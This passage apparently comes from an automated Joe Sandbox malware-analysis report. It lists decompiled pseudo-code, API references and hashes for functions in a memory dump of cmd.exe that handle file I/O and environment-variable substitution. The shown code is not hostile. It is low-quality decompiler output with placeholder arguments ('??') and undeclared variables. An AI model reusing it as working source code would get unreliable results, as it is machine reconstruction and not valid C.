										RtlFreeHeap(GetProcessHeap(), 0, _t42);
									}
								}
							}
						}
					}
					CloseHandle(_t43);
					goto L16;
				} else {
					_t15 = 0;
					L17:
					return E00D96FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
				}
			}

0x00da554f
0x00da5557
0x00da555e
0x00da5564
0x00da5566
0x00da556a
0x00da558a
0x00da558f
0x00da564e
0x00da564e
0x00000000
0x00da564e
0x00da5597
0x00da55a3
0x00da55cb
0x00da55d7
0x00da55e4
0x00da55f0
0x00da55f2
0x00da55f9
0x00da560e
0x00da5612
0x00da5618
0x00da5624
0x00da5629
0x00da562b
0x00da5632
0x00da5634
0x00da5634
0x00da5632
0x00da5641
0x00da5641
0x00da5612
0x00da55f9
0x00da55f0
0x00da55d7
0x00da5648
0x00000000
0x00da556c
0x00da556c
0x00da5651
0x00da5661
0x00da5661

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00DA5584
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00DA55BE
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00DA5601
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00DA5608
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00DA563A
RtlFreeHeap.NTDLL(00000000), ref: 00DA5641
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00DA5648

Strings

PE, xrefs: 00DA55D9

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
String ID: PE
API String ID: 3093239467-4258593460
Opcode ID: 6814d47169b73f895a0f59c41734211688c238943ebde1b361cce06c3b103ae8
Instruction ID: 6de137a9026b0f269eff4f54b8c465d4e58cddc51e03c74c4286c72ffacb0a53
Opcode Fuzzy Hash: 6814d47169b73f895a0f59c41734211688c238943ebde1b361cce06c3b103ae8
Instruction Fuzzy Hash: 4331F534600B16A7DB216B61AD0DFBEB6B9EB86B11F4C0108FD51E62C8DB30CC02CA75

Uniqueness

Uniqueness Score: -1.00%

Function 00DA84FE, Relevance: 13.6, APIs: 9, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00DA84FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t14;
				LONG* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void** _t24;
				void** _t26;
				void* _t38;
				void* _t39;
				void* _t41;
				DWORD* _t42;
				LONG* _t44;
				void* _t45;

				_t24 = _t26;
				_t39 = __edx;
				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
				FlushFileBuffers(__eax);
				_t28 =  *_t24;
				E00D8DB92( *_t24);
				_t30 = E00D85DB5(_t39, 0, _t28, _t28);
				 *_t24 = _t30;
				if(_t30 != 0xffffffff) {
					_t42 = _a4;
					_t12 =  ~_t42;
					__imp___get_osfhandle(2);
					SetFilePointer(_t12, _t30, _t12, 0);
					_t14 =  &_v8;
					__imp___get_osfhandle(0);
					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
					if(_t15 != 0) {
						if(_v8 != _t42) {
							goto L3;
						} else {
							_push(_t42);
							_push(_a12);
							_push(_a8);
							L00D982C7();
							_t30 =  *_t24;
							_t45 = _t45 + 0xc;
							_t44 = _t15;
							E00D8DB92( *_t24);
							if(_t44 != 0) {
								goto L4;
							} else {
								_t21 = E00D85DB5(_t39, 1, _t39, _t39);
								 *_t24 = _t21;
								if(_t21 == 0xffffffff) {
									goto L1;
								} else {
									__imp___get_osfhandle(2);
									SetFilePointer(_t21, _t21, _t44, _t44);
									_t19 = 0;
								}
							}
						}
					} else {
						L3:
						_t30 =  *_t24;
						E00D8DB92( *_t24);
						L4:
						 *_t24 =  *_t24 | 0xffffffff;
						goto L1;
					}
				} else {
					L1:
					E00D8C5A2(_t30, 0x4000271f, 1, _t39);
					_t19 = 1;
				}
				return _t19;
			}

0x00da8505
0x00da8509
0x00da850d
0x00da8515
0x00da851b
0x00da851d
0x00da852d
0x00da852f
0x00da8534
0x00da854e
0x00da8557
0x00da855b
0x00da8563
0x00da856b
0x00da8575
0x00da857d
0x00da8585
0x00da8596
0x00000000
0x00da8598
0x00da8598
0x00da8599
0x00da859c
0x00da859f
0x00da85a4
0x00da85a6
0x00da85a9
0x00da85ab
0x00da85b2
0x00000000
0x00da85b4
0x00da85bb
0x00da85c0
0x00da85c5
0x00000000
0x00da85cb
0x00da85d0
0x00da85d8
0x00da85de
0x00da85de
0x00da85c5
0x00da85b2
0x00da8587
0x00da8587
0x00da8587
0x00da8589
0x00da858e
0x00da858e
0x00000000
0x00da858e
0x00da8536
0x00da8536
0x00da853e
0x00da8548
0x00da8548
0x00da85e6

APIs

_get_osfhandle.MSVCRT ref: 00DA850D
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DA8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DA8515

Part of subcall function 00D8DB92: _close.MSVCRT ref: 00D8DBC1

_get_osfhandle.MSVCRT ref: 00DA855B
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00DA8563
_get_osfhandle.MSVCRT ref: 00DA8575
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00DA857D
memcmp.MSVCRT ref: 00DA859F
_get_osfhandle.MSVCRT ref: 00DA85D0
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DA85D8

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
String ID:
API String ID: 332413853-0
Opcode ID: f2f9fe96d423043ad038a7c1ff1d206255e5ee1a14ee8128b6b023ef25fca7d3
Instruction ID: eb8338f0991a8eda1d392e03644ecb9dc1400daf1ef98dd26c4e963c223dfac6
Opcode Fuzzy Hash: f2f9fe96d423043ad038a7c1ff1d206255e5ee1a14ee8128b6b023ef25fca7d3
Instruction Fuzzy Hash: 9B21B431A00212BBDF246F75DC5DE7B7BAAEF86320B144658F915C62D0EE709C00A771

Uniqueness

Uniqueness Score: -1.00%

Function 00D881E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00D881E0(intOrPtr _a4, long _a8, signed int* _a16) {
				signed int _v8;
				void* _v12;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void _v548;
				void* _v552;
				long _v556;
				char _v560;
				int _v564;
				void* _v568;
				void* _v572;
				void* _v580;
				void _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				long _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				long _t95;
				signed int _t97;
				signed int _t111;
				WCHAR* _t117;
				void* _t119;
				signed int _t120;
				WCHAR* _t122;
				int _t123;
				signed char* _t126;
				WCHAR* _t127;
				WCHAR* _t129;
				signed int _t134;
				WCHAR* _t135;
				void* _t136;
				char _t140;
				void* _t141;
				signed int* _t142;
				signed int _t153;
				signed int _t164;
				intOrPtr _t167;
				void* _t168;
				long _t169;
				WCHAR* _t170;
				char _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;

				_t176 = (_t174 & 0xfffffff8) - 0x44c;
				_t93 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t93 ^ _t176;
				_t95 = _a8;
				_t142 = _a16;
				_v1104 = _t95;
				_v1096 =  *(_t95 + 2) & 0x0000ffff;
				_t140 = 1;
				_t97 =  *_t142;
				_v1088 = _t142;
				_v560 = 1;
				_t167 = _a4;
				_t172 = 0;
				_v1100 = _t97 & 0x00002000;
				_v1092 = _t97 & 0x00000800;
				_v556 = 0x104;
				_v564 = 0;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t178 = _t176 + 0x18;
				if(E00D90C70( &_v1084, 0x7fe9) < 0 || E00D90C70( &_v548, 0x7fe9) < 0) {
					L23:
					_t172 = _t140;
					goto L24;
				} else {
					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
						L6:
						_t161 = _v1104;
						if(( *(_t161 + 4) & 0x00000010) != 0) {
							L24:
							_t140 = _t172;
							L25:
							_t172 = _t140;
							L26:
							_t140 = _t172;
							L27:
							_t172 = _t140;
							L17:
							__imp__??_V@YAXPAX@Z(_v28);
							__imp__??_V@YAXPAX@Z(_v564);
							_pop(_t168);
							_pop(_t173);
							_pop(_t141);
							return E00D96FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
						}
						_t151 = _v564;
						if(_v564 == 0) {
							_t151 =  &_v1084;
						}
						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
						_t161 = _v556;
						_v1096 = _t111;
						if(E00D951C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
							_push(_v1096);
							E00D8C5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
							_t178 = _t178 + 0x10;
							goto L25;
						} else {
							_t152 = _v28;
							if(_v28 == 0) {
								_t152 =  &_v548;
							}
							_t163 = _v20;
							if(E00D951C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
								_t117 = _v564;
								__eflags = _t117;
								if(_t117 == 0) {
									_t117 =  &_v1084;
								}
								_t153 =  &_v548;
								E00D90D89(_t163, _t117);
							}
							if(_v1092 != _t172) {
								_t153 = _v28;
								__eflags = _t153;
								if(_t153 == 0) {
									_t153 =  &_v548;
								}
								_t161 = 0x232c;
								_t119 = E00DA9583(_t153, 0x232c, 0x2328);
								__eflags = _t119 - _t140;
								if(_t119 == _t140) {
									goto L12;
								} else {
									__eflags =  *0xdad544 - _t172; // 0x0
									if(__eflags == 0) {
										goto L26;
									}
									goto L25;
								}
							} else {
								L12:
								_t120 = _v1088;
								_t169 = _v1104;
								_t164 =  *(_t169 + 4);
								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
									_t122 = _v564;
									__eflags = _t122;
									if(_t122 == 0) {
										_t122 =  &_v1084;
									}
									_t161 = _t164 & 0xfffffffe;
									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
									__eflags = _t123;
									if(_t123 != 0) {
										goto L13;
									} else {
										_push(_t172);
										_push(GetLastError());
										E00D8C5A2(_t154);
										goto L27;
									}
								}
								L13:
								_t155 = _v28;
								if(_v28 == 0) {
									_t155 =  &_v548;
								}
								_t161 =  *(_t169 + 4);
								if(E00D883F2(_t155,  *(_t169 + 4)) != 0) {
									_t155 = _v564;
									__eflags = _v564;
									if(_v564 == 0) {
										_t155 =  &_v1084;
									}
									_t161 =  *(_t169 + 4);
									_t170 = E00D883F2(_t155,  *(_t169 + 4));
									__eflags = _t170;
									if(_t170 == 0) {
										goto L15;
									} else {
										__eflags = _t170 - 0x4d3;
										if(_t170 == 0x4d3) {
											goto L27;
										}
										_t129 = _v28;
										__eflags = _t129;
										if(_t129 == 0) {
											_t129 =  &_v548;
										}
										E00D925D9(L"%s\r\n");
										E00D8C5A2(_t155, _t170, _t172, _t129);
										_t178 = _t178 + 0x10;
										goto L17;
									}
								} else {
									L15:
									_t126 = _v1088;
									_t126[0x60] = _t126[0x60] + 1;
									if( *0xdc3cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
										_t127 = _v28;
										__eflags = _t127;
										if(_t127 == 0) {
											_t127 =  &_v548;
										}
										E00D8C108(_t155, 0x400023a1, _t140, _t127);
										_t178 = _t178 + 0xc;
									}
									goto L17;
								}
							}
						}
					} else {
						_t134 = E00D88512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
						_v1100 = _t134;
						if(_t134 != 0) {
							_t159 = _v564;
							__eflags = _v564;
							if(_v564 == 0) {
								_t159 =  &_v1084;
							}
							_t161 = _v556;
							_t135 = E00D951C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
							__eflags = _t135;
							if(_t135 == 0) {
								_t160 = _v564;
								 *((char*)(_t167 + 0x11)) = _t140;
								__eflags = _v564;
								if(_v564 == 0) {
									_t160 =  &_v1084;
								}
								_t161 = 0x234e;
								_t136 = E00DA9583(_t160, 0x234e, 0x2328);
								__eflags = _t136 - _t140;
								if(_t136 != _t140) {
									goto L23;
								} else {
									goto L6;
								}
							} else {
								_push(_v1100);
								E00D8C5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
								_t178 = _t178 + 0x10;
								goto L23;
							}
						}
						goto L6;
					}
				}
			}

0x00d881e8
0x00d881ee
0x00d881f5
0x00d881fc
0x00d881ff
0x00d88202
0x00d8820c
0x00d88210
0x00d88211
0x00d88213
0x00d8821f
0x00d88227
0x00d8822a
0x00d8822c
0x00d8823b
0x00d88240
0x00d8824d
0x00d88254
0x00d8825c
0x00d88268
0x00d8826f
0x00d88280
0x00d88285
0x00d88298
0x00da01dd
0x00da01dd
0x00000000
0x00d882b7
0x00d882bb
0x00d882e0
0x00d882e0
0x00d882e8
0x00da01df
0x00da01df
0x00da01e1
0x00da01e1
0x00da01e3
0x00da01e3
0x00da01e5
0x00da01e5
0x00d883b4
0x00d883bb
0x00d883c9
0x00d883d9
0x00d883da
0x00d883db
0x00d883e6
0x00d883e6
0x00d882ee
0x00d882f7
0x00da0216
0x00da0216
0x00d88307
0x00d8830a
0x00d88315
0x00d88320
0x00da021f
0x00da022d
0x00da0232
0x00000000
0x00d88326
0x00d88326
0x00d8832f
0x00da0237
0x00da0237
0x00d88339
0x00d8834e
0x00da0243
0x00da024a
0x00da024c
0x00da024e
0x00da024e
0x00da0253
0x00da025a
0x00da025a
0x00d88358
0x00da0264
0x00da026b
0x00da026d
0x00da026f
0x00da026f
0x00da027b
0x00da0280
0x00da0285
0x00da0287
0x00000000
0x00da028d
0x00da028d
0x00da0293
0x00000000
0x00000000
0x00000000
0x00da0299
0x00d8835e
0x00d8835e
0x00d8835e
0x00d88362
0x00d8836c
0x00d8836f
0x00d8837a
0x00da029e
0x00da02a5
0x00da02a7
0x00da02a9
0x00da02a9
0x00da02ad
0x00da02b2
0x00da02b8
0x00da02ba
0x00000000
0x00da02c0
0x00da02c0
0x00da02c7
0x00da02c8
0x00000000
0x00da02ce
0x00da02ba
0x00d88380
0x00d88380
0x00d88389
0x00d883e9
0x00d883e9
0x00d8838b
0x00d88395
0x00da02d4
0x00da02db
0x00da02dd
0x00da02df
0x00da02df
0x00da02e3
0x00da02eb
0x00da02ed
0x00da02ef
0x00000000
0x00da02f5
0x00da02f5
0x00da02fb
0x00000000
0x00000000
0x00da0301
0x00da0308
0x00da030a
0x00da030c
0x00da030c
0x00da0319
0x00da0320
0x00da0325
0x00000000
0x00da0325
0x00d8839b
0x00d8839b
0x00d8839b
0x00d8839f
0x00d883a9
0x00da032d
0x00da0334
0x00da0336
0x00da0338
0x00da0338
0x00da0346
0x00da034b
0x00da034b
0x00000000
0x00d883a9
0x00d88395
0x00d88358
0x00d882c9
0x00d882cf
0x00d882d4
0x00d882da
0x00da01a4
0x00da01ab
0x00da01ad
0x00da01af
0x00da01af
0x00da01b3
0x00da01be
0x00da01c3
0x00da01c5
0x00da01ec
0x00da01f3
0x00da01f6
0x00da01f8
0x00da01fa
0x00da01fa
0x00da0203
0x00da0208
0x00da020d
0x00da020f
0x00000000
0x00da0211
0x00000000
0x00da0211
0x00da01c7
0x00da01c7
0x00da01d5
0x00da01da
0x00000000
0x00da01da
0x00da01c5
0x00000000
0x00d882da
0x00d882bb

APIs

memset.MSVCRT ref: 00D88254
memset.MSVCRT ref: 00D88280

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

??_V@YAXPAX@Z.MSVCRT ref: 00D883BB
??_V@YAXPAX@Z.MSVCRT ref: 00D883C9

Strings

%s, xrefs: 00DA0314

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset
String ID: %s
API String ID: 2221118986-3043279178
Opcode ID: cc70e8b531880fc65ad9d2b4a990d6fd793c72eaf4788482de026cf1183a54a9
Instruction ID: 8c7b2ab0fbff45deb7689080a31591663f6c270ca5ba30e588d108be630a07e9
Opcode Fuzzy Hash: cc70e8b531880fc65ad9d2b4a990d6fd793c72eaf4788482de026cf1183a54a9
Instruction Fuzzy Hash: 8091ACB16083419BDB20EF14C895BAEBBE5FF85704F48491DE989C7241DB34E900DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00D88F70, Relevance: 12.4, APIs: 8, Instructions: 447
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00D88F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v20;
				wchar_t* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				wchar_t* _v52;
				signed int _v56;
				int _v60;
				wchar_t* _v64;
				intOrPtr _v68;
				signed int _v72;
				int _v76;
				signed short* _v80;
				void* _v84;
				signed short* _v88;
				signed short* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed short* _v104;
				void* __edi;
				void* __ebp;
				signed int _t127;
				int _t130;
				signed int* _t131;
				intOrPtr* _t135;
				signed int _t139;
				intOrPtr _t142;
				intOrPtr _t143;
				short* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				signed short* _t149;
				wchar_t* _t150;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				signed int _t158;
				signed short* _t162;
				void _t163;
				signed int _t165;
				intOrPtr _t167;
				signed int _t171;
				signed int _t173;
				signed short* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t181;
				signed short* _t190;
				wchar_t* _t191;
				intOrPtr* _t192;
				intOrPtr* _t195;
				signed int _t197;
				void* _t198;
				void* _t199;
				intOrPtr* _t203;
				intOrPtr* _t206;
				intOrPtr* _t209;
				void* _t212;
				intOrPtr* _t213;
				signed int _t219;
				signed short* _t220;
				signed short* _t226;
				signed short* _t228;
				wchar_t* _t229;
				short* _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				signed short* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				signed short* _t244;
				signed short* _t247;
				wchar_t* _t252;
				WCHAR* _t254;
				void* _t255;
				signed int _t256;
				intOrPtr* _t258;
				signed int _t260;
				void* _t262;
				intOrPtr* _t265;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				signed short* _t270;
				signed short* _t271;
				signed short* _t272;
				signed short* _t273;
				intOrPtr _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t282;

				_t229 = __edx;
				_push(0xfffffffe);
				_push(0xdabe58);
				_push(E00D97290);
				_push( *[fs:0x0]);
				_t279 = _t278 - 0x54;
				_t127 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _v12 ^ _t127;
				_push(_t127 ^ _t277);
				 *[fs:0x0] =  &_v20;
				_v52 = __edx;
				_v56 = __ecx;
				_v60 = 0;
				_t252 = 0;
				_v40 = 0;
				_t262 = 0;
				_v36 = 0;
				_v8 = 0;
				_t130 = E00D900B0(0x4000);
				_v60 = _t130;
				if(_t130 == 0) {
					_t171 = _v56;
					if(_t171 == 0) {
						L74:
						_t131 = _a4;
						L75:
						 *_t131 = 0;
						L23:
						_v8 = 0xfffffffe;
						E00D893F4(_t252);
						 *[fs:0x0] = _v20;
						return _t262;
					}
					__imp__longjmp(_t171, 0xffffffff);
					L91:
					_t173 = _v56;
					if(_t173 == 0) {
						L73:
						_t262 = _v36;
						goto L74;
					}
					__imp__longjmp(_t173, 0xffffffff);
					L93:
					_t230 = _t229 - 2;
					_v64 = _t230;
					_v68 = _t173 - 1;
					L20:
					 *_t230 = 0;
					_t175 = _v52;
					_t254 = _v40;
					L21:
					_t135 = _v32;
					_v32 = _t135 + 2;
					_t255 = E00D8CFBC(_t254);
					_v44 = _t255;
					if( *_t135 == 0x3a) {
						if( *0xdc3cc9 == 0 || _t255 == 0) {
							goto L22;
						} else {
							_t190 = _v32;
							_t139 =  *_t190 & 0x0000ffff;
							if(_t139 == 0x7e) {
								_t191 =  &(_t190[1]);
								_v32 = _t191;
								_t256 = wcstol(_t191,  &_v32, 0);
								_v72 = _t256;
								_t176 = _v44;
								if(_t256 >= 0) {
									L50:
									_t192 = _t176;
									_t66 = _t192 + 2; // 0xd97292
									_t231 = _t66;
									do {
										_t142 =  *_t192;
										_t192 = _t192 + 2;
									} while (_t142 != 0);
									if(_t256 >= _t192 - _t231 >> 1) {
										_t195 = _t176;
										_t109 = _t195 + 2; // 0xd97292
										_t232 = _t109;
										do {
											_t143 =  *_t195;
											_t195 = _t195 + 2;
										} while (_t143 != 0);
										_t197 = _t195 - _t232 >> 1;
										L54:
										if(_t197 < 0) {
											_t256 = 0;
											L58:
											_v72 = _t256;
											_t144 = _v32;
											if( *_t144 != 0x2c) {
												_t257 = _t176 + _t256 * 2;
												_t265 = _t176 + _t256 * 2;
												_t104 = _t265 + 2; // 0x2
												_t198 = _t104;
												do {
													_t145 =  *_t265;
													_t265 = _t265 + 2;
												} while (_t145 != 0);
												L72:
												_t267 = _t265 - _t198 >> 1;
												L63:
												_v48 = _t267;
												_t233 = _t176;
												_t78 = _t233 + 2; // 0xd97292
												_t199 = _t78;
												do {
													_t146 =  *_t233;
													_t233 = _t233 + 2;
												} while (_t146 != 0);
												_t255 = _v44;
												E00D96826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
												if( *((short*)(_t255 + _t267 * 2)) != 0) {
													 *((short*)(_t255 + _t267 * 2)) = 0;
												}
												_t149 = _v32;
												_t237 =  &(_t149[1]);
												_v32 = _t237;
												_t131 = _a4;
												if(( *_t149 & 0x0000ffff) != _a8) {
													L98:
													_t262 = _v36;
													_t252 = _v40;
													goto L75;
												} else {
													 *_t131 = _t237 - _v52 >> 1;
													L45:
													_t262 = _t255;
													_v36 = _t262;
													_t252 = _v40;
													goto L23;
												}
											}
											_t150 = _t144 + 2;
											_v32 = _t150;
											_t268 = wcstol(_t150,  &_v32, 0);
											_v48 = _t268;
											if(_t268 < 0) {
												_t203 = _t176 + _t256 * 2;
												_t240 = _t203 + 2;
												do {
													_t152 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t152 != 0);
												_t267 = _t268 + (_t203 - _t240 >> 1);
												_v48 = _t267;
												if(_t267 < 0) {
													_t267 = 0;
												}
											}
											_v48 = _t267;
											_t257 = _t176 + _t256 * 2;
											_t206 = _t257;
											_t76 = _t206 + 2; // 0x2
											_t241 = _t76;
											do {
												_t153 =  *_t206;
												_t206 = _t206 + 2;
											} while (_t153 != 0);
											if(_t267 >= _t206 - _t241 >> 1) {
												_t269 = _t257;
												_t99 = _t269 + 2; // 0x2
												_t198 = _t99;
												do {
													_t154 =  *_t269;
													_t269 = _t269 + 2;
												} while (_t154 != 0);
												goto L72;
											}
											goto L63;
										}
										_t209 = _t176;
										_t67 = _t209 + 2; // 0xd97292
										_t242 = _t67;
										do {
											_t155 =  *_t209;
											_t209 = _t209 + 2;
										} while (_t155 != 0);
										if(_t256 >= _t209 - _t242 >> 1) {
											_t258 = _t176;
											_t110 = _t258 + 2; // 0xd97292
											_t212 = _t110;
											do {
												_t156 =  *_t258;
												_t258 = _t258 + 2;
											} while (_t156 != 0);
											_t256 = _t258 - _t212 >> 1;
										}
										goto L58;
									}
									_t197 = _t256;
									goto L54;
								}
								_t213 = _t176;
								_t64 = _t213 + 2; // 0xd97292
								_t243 = _t64;
								do {
									_t157 =  *_t213;
									_t213 = _t213 + 2;
								} while (_t157 != 0);
								_t256 = _t256 + (_t213 - _t243 >> 1);
								_v72 = _t256;
								goto L50;
							}
							if(_t139 == 0x2a) {
								_t190 =  &(_t190[1]);
								_v32 = _t190;
								_v76 = 1;
							} else {
								_v76 = 0;
							}
							_t270 = _t190;
							_v104 = _t270;
							_t244 = _t270;
							while(1) {
								_t158 =  *_t190 & 0x0000ffff;
								if(_t158 == 0 || _t158 == 0x3d) {
									break;
								}
								_t190 =  &(_t244[1]);
								_v32 = _t190;
								_t244 = _t190;
							}
							if( *_t190 == 0) {
								L100:
								_t252 = _v40;
								goto L73;
							}
							_t178 = _t244 - _t270;
							_t179 = _t178 >> 1;
							if(_t178 == 0) {
								_t180 = _v56;
								if(_t180 == 0) {
									goto L100;
								}
								E00D8C5A2(_t190, 0x234a, 1, _t244);
								_t282 = _t279 + 0xc;
								__imp__longjmp(_t180, 0xffffffff);
								L103:
								_t255 = _v44;
								memcpy(_t255, ??, ??);
								E00D91040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
								goto L45;
							}
							_t162 =  &(_t244[1]);
							_t271 = _t162;
							_v80 = _t271;
							while(1) {
								_t247 = _t162;
								_v32 = _t162;
								_t219 =  *_t162 & 0x0000ffff;
								if(_t219 == 0 || _t219 == _a8) {
									break;
								}
								_t162 =  &(_t247[1]);
							}
							_t131 = _a4;
							if( *_t162 == 0) {
								goto L98;
							}
							_t220 =  &(_t247[1]);
							_v32 = _t220;
							_v56 = _t247 - _t271 >> 1;
							 *_t131 = _t220 - _v52 >> 1;
							if( *_t255 == 0) {
								goto L45;
							}
							_t272 = _v60;
							_t163 = E00D91040(_t272, 0x2000, _t255);
							_v88 = _t272;
							_v84 = _t255;
							while(1) {
								L42:
								__imp___wcsnicmp(_t272, _v104, _t179);
								_t282 = _t279 + 0xc;
								if(_t163 != 0) {
									break;
								}
								_t270 =  &(_t272[_t179]);
								_push(_v56 + _v56);
								_push(_v80);
								if(_v76 != 0) {
									goto L103;
								}
								_t163 = memcpy(_t255, ??, ??);
								_t279 = _t282 + 0xc;
								_t255 = _t255 + _v56 * 2;
								_v84 = _t255;
								_v88 = _t270;
							}
							_t163 =  *_t272 & 0x0000ffff;
							 *_t255 = _t163;
							_t255 = _t255 + 2;
							_v84 = _t255;
							_t272 =  &(_t272[1]);
							_v88 = _t272;
							if(_t163 != 0) {
								goto L42;
							}
							_t255 = _v44;
							goto L45;
						}
					}
					L22:
					 *_a4 = _v32 - _t175 >> 1;
					_t262 = _t255;
					_v36 = _t262;
					_t252 = _v40;
					goto L23;
				}
				_t226 = __edx;
				_v32 = __edx;
				_t273 = __edx;
				_t229 =  *0xdc3cc9;
				while(1) {
					_t165 =  *_t226 & 0x0000ffff;
					if(_t165 == 0) {
						break;
					}
					_t181 = _a8;
					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
						break;
					} else {
						_t13 =  &(_t273[1]); // 0x2
						_t226 = _t13;
						_v32 = _t226;
						_t273 = _t226;
						continue;
					}
				}
				if( *_t226 == 0) {
					goto L73;
				}
				_t175 = _v52;
				if(_t273 == _t175) {
					goto L73;
				}
				_t276 = (_t273 - _t175 >> 1) + 1;
				_t252 = E00D900B0(_t276 + _t276);
				_v40 = _t252;
				if(_t252 == 0) {
					goto L91;
				}
				_t19 = _t276 - 1; // 0x0
				_t167 = _t19;
				if(_t276 == 0) {
					goto L21;
				}
				if(_t276 > 0x7fffffff) {
					if(_t276 == 0) {
						goto L21;
					}
					L95:
					 *_t252 = 0;
					goto L21;
				}
				if(_t167 > 0x7ffffffe) {
					goto L95;
				}
				_t228 = _t175;
				_t229 = _t252;
				_t173 = 0;
				while(1) {
					_v68 = _t173;
					_v64 = _t229;
					_v96 = _t276;
					_v92 = _t228;
					_v100 = _t167;
					if(_t276 == 0) {
						goto L93;
					}
					if(_t167 == 0) {
						L19:
						if(_t276 == 0) {
							goto L93;
						}
						goto L20;
					}
					_t260 =  *_t228 & 0x0000ffff;
					if(_t260 == 0) {
						goto L19;
					}
					 *_t229 = _t260;
